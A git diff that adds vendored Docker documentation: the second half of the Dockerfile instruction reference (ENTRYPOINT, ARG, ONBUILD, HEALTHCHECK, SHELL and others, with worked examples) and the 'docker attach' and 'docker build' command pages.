+ +- If `` is a directory, the entire contents of the directory are copied, + including filesystem metadata. + +> **Note**: +> The directory itself is not copied, just its contents. + +- If `` is any other kind of file, it is copied individually along with + its metadata. In this case, if `` ends with a trailing slash `/`, it + will be considered a directory and the contents of `` will be written + at `/base()`. + +- If multiple `` resources are specified, either directly or due to the + use of a wildcard, then `` must be a directory, and it must end with + a slash `/`. + +- If `` does not end with a trailing slash, it will be considered a + regular file and the contents of `` will be written at ``. + +- If `` doesn't exist, it is created along with all missing directories + in its path. + +## ENTRYPOINT + +ENTRYPOINT has two forms: + +- `ENTRYPOINT ["executable", "param1", "param2"]` + (*exec* form, preferred) +- `ENTRYPOINT command param1 param2` + (*shell* form) + +An `ENTRYPOINT` allows you to configure a container that will run as an executable. + +For example, the following will start nginx with its default content, listening +on port 80: + + docker run -i -t --rm -p 80:80 nginx + +Command line arguments to `docker run ` will be appended after all +elements in an *exec* form `ENTRYPOINT`, and will override all elements specified +using `CMD`. +This allows arguments to be passed to the entry point, i.e., `docker run -d` +will pass the `-d` argument to the entry point. +You can override the `ENTRYPOINT` instruction using the `docker run --entrypoint` +flag. + +The *shell* form prevents any `CMD` or `run` command line arguments from being +used, but has the disadvantage that your `ENTRYPOINT` will be started as a +subcommand of `/bin/sh -c`, which does not pass signals. +This means that the executable will not be the container's `PID 1` - and +will _not_ receive Unix signals - so your executable will not receive a +`SIGTERM` from `docker stop `. 
+ +Only the last `ENTRYPOINT` instruction in the `Dockerfile` will have an effect. + +### Exec form ENTRYPOINT example + +You can use the *exec* form of `ENTRYPOINT` to set fairly stable default commands +and arguments and then use either form of `CMD` to set additional defaults that +are more likely to be changed. + + FROM ubuntu + ENTRYPOINT ["top", "-b"] + CMD ["-c"] + +When you run the container, you can see that `top` is the only process: + + $ docker run -it --rm --name test top -H + top - 08:25:00 up 7:27, 0 users, load average: 0.00, 0.01, 0.05 + Threads: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + %Cpu(s): 0.1 us, 0.1 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st + KiB Mem: 2056668 total, 1616832 used, 439836 free, 99352 buffers + KiB Swap: 1441840 total, 0 used, 1441840 free. 1324440 cached Mem + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 19744 2336 2080 R 0.0 0.1 0:00.04 top + +To examine the result further, you can use `docker exec`: + + $ docker exec -it test ps aux + USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND + root 1 2.6 0.1 19752 2352 ? Ss+ 08:24 0:00 top -b -H + root 7 0.0 0.1 15572 2164 ? R+ 08:25 0:00 ps aux + +And you can gracefully request `top` to shut down using `docker stop test`. 
+ +The following `Dockerfile` shows using the `ENTRYPOINT` to run Apache in the +foreground (i.e., as `PID 1`): + +``` +FROM debian:stable +RUN apt-get update && apt-get install -y --force-yes apache2 +EXPOSE 80 443 +VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"] +ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] +``` + +If you need to write a starter script for a single executable, you can ensure that +the final executable receives the Unix signals by using `exec` and `gosu` +commands: + +```bash +#!/bin/bash +set -e + +if [ "$1" = 'postgres' ]; then + chown -R postgres "$PGDATA" + + if [ -z "$(ls -A "$PGDATA")" ]; then + gosu postgres initdb + fi + + exec gosu postgres "$@" +fi + +exec "$@" +``` + +Lastly, if you need to do some extra cleanup (or communicate with other containers) +on shutdown, or are co-ordinating more than one executable, you may need to ensure +that the `ENTRYPOINT` script receives the Unix signals, passes them on, and then +does some more work: + +``` +#!/bin/sh +# Note: I've written this using sh so it works in the busybox container too + +# USE the trap if you need to also do manual cleanup after the service is stopped, +# or need to start multiple services in the one container +trap "echo TRAPed signal" HUP INT QUIT TERM + +# start service in background here +/usr/sbin/apachectl start + +echo "[hit enter key to exit] or run 'docker stop '" +read + +# stop service and clean up here +echo "stopping apache" +/usr/sbin/apachectl stop + +echo "exited $0" +``` + +If you run this image with `docker run -it --rm -p 80:80 --name test apache`, +you can then examine the container's processes with `docker exec`, or `docker top`, +and then ask the script to stop Apache: + +```bash +$ docker exec -it test ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.1 0.0 4448 692 ? Ss+ 00:42 0:00 /bin/sh /run.sh 123 cmd cmd2 +root 19 0.0 0.2 71304 4440 ? 
Ss 00:42 0:00 /usr/sbin/apache2 -k start +www-data 20 0.2 0.2 360468 6004 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start +www-data 21 0.2 0.2 360468 6000 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start +root 81 0.0 0.1 15572 2140 ? R+ 00:44 0:00 ps aux +$ docker top test +PID USER COMMAND +10035 root {run.sh} /bin/sh /run.sh 123 cmd cmd2 +10054 root /usr/sbin/apache2 -k start +10055 33 /usr/sbin/apache2 -k start +10056 33 /usr/sbin/apache2 -k start +$ /usr/bin/time docker stop test +test +real 0m 0.27s +user 0m 0.03s +sys 0m 0.03s +``` + +> **Note:** you can override the `ENTRYPOINT` setting using `--entrypoint`, +> but this can only set the binary to *exec* (no `sh -c` will be used). + +> **Note**: +> The *exec* form is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +> **Note**: +> Unlike the *shell* form, the *exec* form does not invoke a command shell. +> This means that normal shell processing does not happen. For example, +> `ENTRYPOINT [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. +> If you want shell processing then either use the *shell* form or execute +> a shell directly, for example: `ENTRYPOINT [ "sh", "-c", "echo $HOME" ]`. +> When using the exec form and executing a shell directly, as in the case for +> the shell form, it is the shell that is doing the environment variable +> expansion, not docker. + +### Shell form ENTRYPOINT example + +You can specify a plain string for the `ENTRYPOINT` and it will execute in `/bin/sh -c`. +This form will use shell processing to substitute shell environment variables, +and will ignore any `CMD` or `docker run` command line arguments. 
+To ensure that `docker stop` will signal any long running `ENTRYPOINT` executable +correctly, you need to remember to start it with `exec`: + + FROM ubuntu + ENTRYPOINT exec top -b + +When you run this image, you'll see the single `PID 1` process: + + $ docker run -it --rm --name test top + Mem: 1704520K used, 352148K free, 0K shrd, 0K buff, 140368121167873K cached + CPU: 5% usr 0% sys 0% nic 94% idle 0% io 0% irq 0% sirq + Load average: 0.08 0.03 0.05 2/98 6 + PID PPID USER STAT VSZ %VSZ %CPU COMMAND + 1 0 root R 3164 0% 0% top -b + +Which will exit cleanly on `docker stop`: + + $ /usr/bin/time docker stop test + test + real 0m 0.20s + user 0m 0.02s + sys 0m 0.04s + +If you forget to add `exec` to the beginning of your `ENTRYPOINT`: + + FROM ubuntu + ENTRYPOINT top -b + CMD --ignored-param1 + +You can then run it (giving it a name for the next step): + + $ docker run -it --name test top --ignored-param2 + Mem: 1704184K used, 352484K free, 0K shrd, 0K buff, 140621524238337K cached + CPU: 9% usr 2% sys 0% nic 88% idle 0% io 0% irq 0% sirq + Load average: 0.01 0.02 0.05 2/101 7 + PID PPID USER STAT VSZ %VSZ %CPU COMMAND + 1 0 root S 3168 0% 0% /bin/sh -c top -b cmd cmd2 + 7 1 root R 3164 0% 0% top -b + +You can see from the output of `top` that the specified `ENTRYPOINT` is not `PID 1`. + +If you then run `docker stop test`, the container will not exit cleanly - the +`stop` command will be forced to send a `SIGKILL` after the timeout: + + $ docker exec -it test ps aux + PID USER COMMAND + 1 root /bin/sh -c top -b cmd cmd2 + 7 root top -b + 8 root ps aux + $ /usr/bin/time docker stop test + test + real 0m 10.19s + user 0m 0.04s + sys 0m 0.03s + +### Understand how CMD and ENTRYPOINT interact + +Both `CMD` and `ENTRYPOINT` instructions define what command gets executed when running a container. +There are few rules that describe their co-operation. + +1. Dockerfile should specify at least one of `CMD` or `ENTRYPOINT` commands. + +2. 
`ENTRYPOINT` should be defined when using the container as an executable. + +3. `CMD` should be used as a way of defining default arguments for an `ENTRYPOINT` command +or for executing an ad-hoc command in a container. + +4. `CMD` will be overridden when running the container with alternative arguments. + +The table below shows what command is executed for different `ENTRYPOINT` / `CMD` combinations: + +| | No ENTRYPOINT | ENTRYPOINT exec_entry p1_entry | ENTRYPOINT ["exec_entry", "p1_entry"] | +|--------------------------------|----------------------------|--------------------------------|------------------------------------------------| +| **No CMD** | *error, not allowed* | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry | +| **CMD ["exec_cmd", "p1_cmd"]** | exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry exec_cmd p1_cmd | +| **CMD ["p1_cmd", "p2_cmd"]** | p1_cmd p2_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry p1_cmd p2_cmd | +| **CMD exec_cmd p1_cmd** | /bin/sh -c exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry /bin/sh -c exec_cmd p1_cmd | + +## VOLUME + + VOLUME ["/data"] + +The `VOLUME` instruction creates a mount point with the specified name +and marks it as holding externally mounted volumes from native host or other +containers. The value can be a JSON array, `VOLUME ["/var/log/"]`, or a plain +string with multiple arguments, such as `VOLUME /var/log` or `VOLUME /var/log +/var/db`. For more information/examples and mounting instructions via the +Docker client, refer to +[*Share Directories via Volumes*](https://docs.docker.com/engine/tutorials/dockervolumes/#/mount-a-host-directory-as-a-data-volume) +documentation. + +The `docker run` command initializes the newly created volume with any data +that exists at the specified location within the base image. 
For example,
+consider the following Dockerfile snippet:
+
+    FROM ubuntu
+    RUN mkdir /myvol
+    RUN echo "hello world" > /myvol/greeting
+    VOLUME /myvol
+
+This Dockerfile results in an image that causes `docker run` to
+create a new mount point at `/myvol` and copy the `greeting` file
+into the newly created volume.
+
+> **Note**:
+> If any build steps change the data within the volume after it has been
+> declared, those changes will be discarded.
+
+> **Note**:
+> The list is parsed as a JSON array, which means that
+> you must use double-quotes (") around words not single-quotes (').
+
+## USER
+
+    USER daemon
+
+The `USER` instruction sets the user name or UID to use when running the image
+and for any `RUN`, `CMD` and `ENTRYPOINT` instructions that follow it in the
+`Dockerfile`.
+
+## WORKDIR
+
+    WORKDIR /path/to/workdir
+
+The `WORKDIR` instruction sets the working directory for any `RUN`, `CMD`,
+`ENTRYPOINT`, `COPY` and `ADD` instructions that follow it in the `Dockerfile`.
+If the `WORKDIR` doesn't exist, it will be created even if it's not used in any
+subsequent `Dockerfile` instruction.
+
+It can be used multiple times in the one `Dockerfile`. If a relative path
+is provided, it will be relative to the path of the previous `WORKDIR`
+instruction. For example:
+
+    WORKDIR /a
+    WORKDIR b
+    WORKDIR c
+    RUN pwd
+
+The output of the final `pwd` command in this `Dockerfile` would be
+`/a/b/c`.
+
+The `WORKDIR` instruction can resolve environment variables previously set using
+`ENV`. You can only use environment variables explicitly set in the `Dockerfile`.
+For example:
+
+    ENV DIRPATH /path
+    WORKDIR $DIRPATH/$DIRNAME
+    RUN pwd
+
+The output of the final `pwd` command in this `Dockerfile` would be
+`/path/$DIRNAME`
+
+## ARG
+
+    ARG <name>[=<default value>]
+
+The `ARG` instruction defines a variable that users can pass at build-time to
+the builder with the `docker build` command using the `--build-arg <varname>=<value>`
+flag.
If a user specifies a build argument that was not +defined in the Dockerfile, the build outputs a warning. + +``` +[Warning] One or more build-args [foo] were not consumed. +``` + +The Dockerfile author can define a single variable by specifying `ARG` once or many +variables by specifying `ARG` more than once. For example, a valid Dockerfile: + +``` +FROM busybox +ARG user1 +ARG buildno +... +``` + +A Dockerfile author may optionally specify a default value for an `ARG` instruction: + +``` +FROM busybox +ARG user1=someuser +ARG buildno=1 +... +``` + +If an `ARG` value has a default and if there is no value passed at build-time, the +builder uses the default. + +An `ARG` variable definition comes into effect from the line on which it is +defined in the `Dockerfile` not from the argument's use on the command-line or +elsewhere. For example, consider this Dockerfile: + +``` +1 FROM busybox +2 USER ${user:-some_user} +3 ARG user +4 USER $user +... +``` +A user builds this file by calling: + +``` +$ docker build --build-arg user=what_user Dockerfile +``` + +The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the +subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is +defined and the `what_user` value was passed on the command line. Prior to its definition by an +`ARG` instruction, any use of a variable results in an empty string. + +> **Warning:** It is not recommended to use build-time variables for +> passing secrets like github keys, user credentials etc. Build-time variable +> values are visible to any user of the image with the `docker history` command. + +You can use an `ARG` or an `ENV` instruction to specify variables that are +available to the `RUN` instruction. Environment variables defined using the +`ENV` instruction always override an `ARG` instruction of the same name. Consider +this Dockerfile with an `ENV` and `ARG` instruction. 
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER v1.0.0
+4 RUN echo $CONT_IMG_VER
+```
+Then, assume this image is built with this command:
+
+```
+$ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile
+```
+
+In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting
+passed by the user: `v2.0.1`. This behavior is similar to a shell
+script where a locally scoped variable overrides the variables passed as
+arguments or inherited from environment, from its point of definition.
+
+Using the example above but a different `ENV` specification you can create more
+useful interactions between `ARG` and `ENV` instructions:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0}
+4 RUN echo $CONT_IMG_VER
+```
+
+Unlike an `ARG` instruction, `ENV` values are always persisted in the built
+image. Consider a docker build without the `--build-arg` flag:
+
+```
+$ docker build Dockerfile
+```
+
+Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but
+its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction.
+
+The variable expansion technique in this example allows you to pass arguments
+from the command line and persist them in the final image by leveraging the
+`ENV` instruction. Variable expansion is only supported for [a limited set of
+Dockerfile instructions.](#environment-replacement)
+
+Docker has a set of predefined `ARG` variables that you can use without a
+corresponding `ARG` instruction in the Dockerfile.
+
+* `HTTP_PROXY`
+* `http_proxy`
+* `HTTPS_PROXY`
+* `https_proxy`
+* `FTP_PROXY`
+* `ftp_proxy`
+* `NO_PROXY`
+* `no_proxy`
+
+To use these, simply pass them on the command line using the flag:
+
+```
+--build-arg <varname>=<value>
+```
+
+### Impact on build caching
+
+`ARG` variables are not persisted into the built image as `ENV` variables are.
+However, `ARG` variables do impact the build cache in similar ways.
If a
+Dockerfile defines an `ARG` variable whose value is different from a previous
+build, then a "cache miss" occurs upon its first usage, not its definition. In
+particular, all `RUN` instructions following an `ARG` instruction use the `ARG`
+variable implicitly (as an environment variable), thus can cause a cache miss.
+
+For example, consider these two Dockerfiles:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 RUN echo $CONT_IMG_VER
+```
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 RUN echo hello
+```
+
+If you specify `--build-arg CONT_IMG_VER=<value>` on the command line, in both
+cases, the specification on line 2 does not cause a cache miss; line 3 does
+cause a cache miss. `ARG CONT_IMG_VER` causes the RUN line to be identified
+as the same as running `CONT_IMG_VER=<value> echo hello`, so if the `<value>`
+changes, we get a cache miss.
+
+Consider another example under the same command line:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER $CONT_IMG_VER
+4 RUN echo $CONT_IMG_VER
+```
+In this example, the cache miss occurs on line 3. The miss happens because
+the variable's value in the `ENV` references the `ARG` variable and that
+variable is changed through the command line. In this example, the `ENV`
+command causes the image to include the value.
+
+If an `ENV` instruction overrides an `ARG` instruction of the same name, like
+this Dockerfile:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER hello
+4 RUN echo $CONT_IMG_VER
+```
+
+Line 3 does not cause a cache miss because the value of `CONT_IMG_VER` is a
+constant (`hello`). As a result, the environment variables and values used on
+the `RUN` (line 4) doesn't change between builds.
+
+## ONBUILD
+
+    ONBUILD [INSTRUCTION]
+
+The `ONBUILD` instruction adds to the image a *trigger* instruction to
+be executed at a later time, when the image is used as the base for
+another build.
The trigger will be executed in the context of the +downstream build, as if it had been inserted immediately after the +`FROM` instruction in the downstream `Dockerfile`. + +Any build instruction can be registered as a trigger. + +This is useful if you are building an image which will be used as a base +to build other images, for example an application build environment or a +daemon which may be customized with user-specific configuration. + +For example, if your image is a reusable Python application builder, it +will require application source code to be added in a particular +directory, and it might require a build script to be called *after* +that. You can't just call `ADD` and `RUN` now, because you don't yet +have access to the application source code, and it will be different for +each application build. You could simply provide application developers +with a boilerplate `Dockerfile` to copy-paste into their application, but +that is inefficient, error-prone and difficult to update because it +mixes with application-specific code. + +The solution is to use `ONBUILD` to register advance instructions to +run later, during the next build stage. + +Here's how it works: + +1. When it encounters an `ONBUILD` instruction, the builder adds a + trigger to the metadata of the image being built. The instruction + does not otherwise affect the current build. +2. At the end of the build, a list of all triggers is stored in the + image manifest, under the key `OnBuild`. They can be inspected with + the `docker inspect` command. +3. Later the image may be used as a base for a new build, using the + `FROM` instruction. As part of processing the `FROM` instruction, + the downstream builder looks for `ONBUILD` triggers, and executes + them in the same order they were registered. If any of the triggers + fail, the `FROM` instruction is aborted which in turn causes the + build to fail. If all triggers succeed, the `FROM` instruction + completes and the build continues as usual. 
+4. Triggers are cleared from the final image after being executed. In + other words they are not inherited by "grand-children" builds. + +For example you might add something like this: + + [...] + ONBUILD ADD . /app/src + ONBUILD RUN /usr/local/bin/python-build --dir /app/src + [...] + +> **Warning**: Chaining `ONBUILD` instructions using `ONBUILD ONBUILD` isn't allowed. + +> **Warning**: The `ONBUILD` instruction may not trigger `FROM` or `MAINTAINER` instructions. + +## STOPSIGNAL + + STOPSIGNAL signal + +The `STOPSIGNAL` instruction sets the system call signal that will be sent to the container to exit. +This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, +or a signal name in the format SIGNAME, for instance SIGKILL. + +## HEALTHCHECK + +The `HEALTHCHECK` instruction has two forms: + +* `HEALTHCHECK [OPTIONS] CMD command` (check container health by running a command inside the container) +* `HEALTHCHECK NONE` (disable any healthcheck inherited from the base image) + +The `HEALTHCHECK` instruction tells Docker how to test a container to check that +it is still working. This can detect cases such as a web server that is stuck in +an infinite loop and unable to handle new connections, even though the server +process is still running. + +When a container has a healthcheck specified, it has a _health status_ in +addition to its normal status. This status is initially `starting`. Whenever a +health check passes, it becomes `healthy` (whatever state it was previously in). +After a certain number of consecutive failures, it becomes `unhealthy`. + +The options that can appear before `CMD` are: + +* `--interval=DURATION` (default: `30s`) +* `--timeout=DURATION` (default: `30s`) +* `--retries=N` (default: `3`) + +The health check will first run **interval** seconds after the container is +started, and then again **interval** seconds after each previous check completes. 
+ +If a single run of the check takes longer than **timeout** seconds then the check +is considered to have failed. + +It takes **retries** consecutive failures of the health check for the container +to be considered `unhealthy`. + +There can only be one `HEALTHCHECK` instruction in a Dockerfile. If you list +more than one then only the last `HEALTHCHECK` will take effect. + +The command after the `CMD` keyword can be either a shell command (e.g. `HEALTHCHECK +CMD /bin/check-running`) or an _exec_ array (as with other Dockerfile commands; +see e.g. `ENTRYPOINT` for details). + +The command's exit status indicates the health status of the container. +The possible values are: + +- 0: success - the container is healthy and ready for use +- 1: unhealthy - the container is not working correctly +- 2: reserved - do not use this exit code + +For example, to check every five minutes or so that a web-server is able to +serve the site's main page within three seconds: + + HEALTHCHECK --interval=5m --timeout=3s \ + CMD curl -f http://localhost/ || exit 1 + +To help debug failing probes, any output text (UTF-8 encoded) that the command writes +on stdout or stderr will be stored in the health status and can be queried with +`docker inspect`. Such output should be kept short (only the first 4096 bytes +are stored currently). + +When the health status of a container changes, a `health_status` event is +generated with the new status. + +The `HEALTHCHECK` feature was added in Docker 1.12. + + +## SHELL + + SHELL ["executable", "parameters"] + +The `SHELL` instruction allows the default shell used for the *shell* form of +commands to be overridden. The default shell on Linux is `["/bin/sh", "-c"]`, and on +Windows is `["cmd", "/S", "/C"]`. The `SHELL` instruction *must* be written in JSON +form in a Dockerfile. 
+ +The `SHELL` instruction is particularly useful on Windows where there are +two commonly used and quite different native shells: `cmd` and `powershell`, as +well as alternate shells available including `sh`. + +The `SHELL` instruction can appear multiple times. Each `SHELL` instruction overrides +all previous `SHELL` instructions, and affects all subsequent instructions. For example: + + FROM microsoft/windowsservercore + + # Executed as cmd /S /C echo default + RUN echo default + + # Executed as cmd /S /C powershell -command Write-Host default + RUN powershell -command Write-Host default + + # Executed as powershell -command Write-Host hello + SHELL ["powershell", "-command"] + RUN Write-Host hello + + # Executed as cmd /S /C echo hello + SHELL ["cmd", "/S", "/C"] + RUN echo hello + +The following instructions can be affected by the `SHELL` instruction when the +*shell* form of them is used in a Dockerfile: `RUN`, `CMD` and `ENTRYPOINT`. + +The following example is a common pattern found on Windows which can be +streamlined by using the `SHELL` instruction: + + ... + RUN powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" + ... + +The command invoked by docker will be: + + cmd /S /C powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" + +This is inefficient for two reasons. First, there is an un-necessary cmd.exe command +processor (aka shell) being invoked. Second, each `RUN` instruction in the *shell* +form requires an extra `powershell -command` prefixing the command. + +To make this more efficient, one of two mechanisms can be employed. One is to +use the JSON form of the RUN command such as: + + ... + RUN ["powershell", "-command", "Execute-MyCmdlet", "-param1 \"c:\\foo.txt\""] + ... + +While the JSON form is unambiguous and does not use the un-necessary cmd.exe, +it does require more verbosity through double-quoting and escaping.
The alternate +mechanism is to use the `SHELL` instruction and the *shell* form, +making a more natural syntax for Windows users, especially when combined with +the `escape` parser directive: + + # escape=` + + FROM microsoft/nanoserver + SHELL ["powershell","-command"] + RUN New-Item -ItemType Directory C:\Example + ADD Execute-MyCmdlet.ps1 c:\example\ + RUN c:\example\Execute-MyCmdlet -sample 'hello world' + +Resulting in: + + PS E:\docker\build\shell> docker build -t shell . + Sending build context to Docker daemon 4.096 kB + Step 1/5 : FROM microsoft/nanoserver + ---> 22738ff49c6d + Step 2/5 : SHELL powershell -command + ---> Running in 6fcdb6855ae2 + ---> 6331462d4300 + Removing intermediate container 6fcdb6855ae2 + Step 3/5 : RUN New-Item -ItemType Directory C:\Example + ---> Running in d0eef8386e97 + + + Directory: C:\ + + + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 10/28/2016 11:26 AM Example + + + ---> 3f2fbf1395d9 + Removing intermediate container d0eef8386e97 + Step 4/5 : ADD Execute-MyCmdlet.ps1 c:\example\ + ---> a955b2621c31 + Removing intermediate container b825593d39fc + Step 5/5 : RUN c:\example\Execute-MyCmdlet 'hello world' + ---> Running in be6d8e63fe75 + hello world + ---> 8e559e9bf424 + Removing intermediate container be6d8e63fe75 + Successfully built 8e559e9bf424 + PS E:\docker\build\shell> + +The `SHELL` instruction could also be used to modify the way in which +a shell operates. For example, using `SHELL cmd /S /C /V:ON|OFF` on Windows, delayed +environment variable expansion semantics could be modified. + +The `SHELL` instruction can also be used on Linux should an alternate shell be +required such as `zsh`, `csh`, `tcsh` and others. + +The `SHELL` feature was added in Docker 1.12. + +## Dockerfile examples + +Below you can see some examples of Dockerfile syntax. If you're interested in +something more realistic, take a look at the list of [Dockerization examples](https://docs.docker.com/engine/examples/). 
+ +``` +# Nginx +# +# VERSION 0.0.1 + +FROM ubuntu +LABEL Description="This image is used to start the foobar executable" Vendor="ACME Products" Version="1.0" +RUN apt-get update && apt-get install -y inotify-tools nginx apache2 openssh-server +``` + +``` +# Firefox over VNC +# +# VERSION 0.3 + +FROM ubuntu + +# Install vnc, xvfb in order to create a 'fake' display and firefox +RUN apt-get update && apt-get install -y x11vnc xvfb firefox +RUN mkdir ~/.vnc +# Setup a password +RUN x11vnc -storepasswd 1234 ~/.vnc/passwd +# Autostart firefox (might not be the best way, but it does the trick) +RUN bash -c 'echo "firefox" >> /.bashrc' + +EXPOSE 5900 +CMD ["x11vnc", "-forever", "-usepw", "-create"] +``` + +``` +# Multiple images example +# +# VERSION 0.1 + +FROM ubuntu +RUN echo foo > bar +# Will output something like ===> 907ad6c2736f + +FROM ubuntu +RUN echo moo > oink +# Will output something like ===> 695d7793cbe4 + +# You᾿ll now have two images, 907ad6c2736f with /bar, and 695d7793cbe4 with +# /oink. +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md new file mode 100644 index 0000000000..307068a339 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md @@ -0,0 +1,131 @@ +--- +title: "attach" +description: "The attach command description and usage" +keywords: "attach, running, container" +--- + + + +# attach + +```markdown +Usage: docker attach [OPTIONS] CONTAINER + +Attach to a running container + +Options: + --detach-keys string Override the key sequence for detaching a container + --help Print usage + --no-stdin Do not attach STDIN + --sig-proxy Proxy all received signals to the process (default true) +``` + +Use `docker attach` to attach to a running container using the container's ID +or name, either to view its ongoing output or to control it interactively. 
+You can attach to the same contained process multiple times simultaneously, +screen sharing style, or quickly view the progress of your detached process. + +To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the +container. If `--sig-proxy` is true (the default),`CTRL-c` sends a `SIGINT` to +the container. You can detach from a container and leave it running using the + `CTRL-p CTRL-q` key sequence. + +> **Note:** +> A process running as PID 1 inside a container is treated specially by +> Linux: it ignores any signal with the default action. So, the process +> will not terminate on `SIGINT` or `SIGTERM` unless it is coded to do +> so. + +It is forbidden to redirect the standard input of a `docker attach` command +while attaching to a tty-enabled container (i.e.: launched with `-t`). + +While a client is connected to container's stdio using `docker attach`, Docker +uses a ~1MB memory buffer to maximize the throughput of the application. If +this buffer is filled, the speed of the API connection will start to have an +effect on the process output writing speed. This is similar to other +applications like SSH. Because of this, it is not recommended to run +performance critical applications that generate a lot of output in the +foreground over a slow client connection. Instead, users should use the +`docker logs` command to get access to the logs. + + +## Override the detach sequence + +If you want, you can configure an override the Docker key sequence for detach. +This is useful if the Docker default sequence conflicts with key sequence you +use for other applications. There are two ways to define your own detach key +sequence, as a per-container override or as a configuration property on your +entire configuration. + +To override the sequence for an individual container, use the +`--detach-keys=""` flag with the `docker attach` command. 
The format of +the `<key>` is either a letter [a-Z], or the `ctrl-` combined with any of +the following: + +* `a-z` (a single lowercase alpha character ) +* `@` (at sign) +* `[` (left bracket) +* `\\` (two backward slashes) +* `_` (underscore) +* `^` (caret) + +These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key +sequences. To configure a different configuration default key sequence for all +containers, see [**Configuration file** section](cli.md#configuration-files). + +#### Examples + + $ docker run -d --name topdemo ubuntu /usr/bin/top -b + $ docker attach topdemo + top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355560k used, 18012k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221740k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top + + top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355244k used, 18328k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221776k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top + + + top - 02:05:58 up 3:06, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.2%us, 0.3%sy, 0.0%ni, 99.5%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355780k used, 17792k free, 27880k buffers + Swap: 786428k total, 0k used, 786428k free, 221776k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top + ^C$ + $ echo $?
+ 0 + $ docker ps -a | grep topdemo + 7998ac8581f9 ubuntu:14.04 "/usr/bin/top -b" 38 seconds ago Exited (0) 21 seconds ago topdemo + +And in this second example, you can see the exit code returned by the `bash` +process is returned by the `docker attach` command to its caller too: + + $ docker run --name test -d -it debian + 275c44472aebd77c926d4527885bb09f2f6db21d878c75f0a1c212c03d3bcfab + $ docker attach test + root@f38c87f2a42d:/# exit 13 + exit + $ echo $? + 13 + $ docker ps -a | grep test + 275c44472aeb debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/build.md b/vendor/github.com/docker/docker/docs/reference/commandline/build.md new file mode 100644 index 0000000000..42c3ecf65f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/build.md @@ -0,0 +1,451 @@ +--- +title: "build" +description: "The build command description and usage" +keywords: "build, docker, image" +--- + + + +# build + +```markdown +Usage: docker build [OPTIONS] PATH | URL | - + +Build an image from a Dockerfile + +Options: + --build-arg value Set build-time variables (default []) + --cache-from value Images to consider as cache sources (default []) + --cgroup-parent string Optional parent cgroup for the container + --compress Compress the build context using gzip + --cpu-period int Limit the CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit the CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + --disable-content-trust Skip image verification (default true) + -f, --file string Name of the Dockerfile (Default is 'PATH/Dockerfile') + 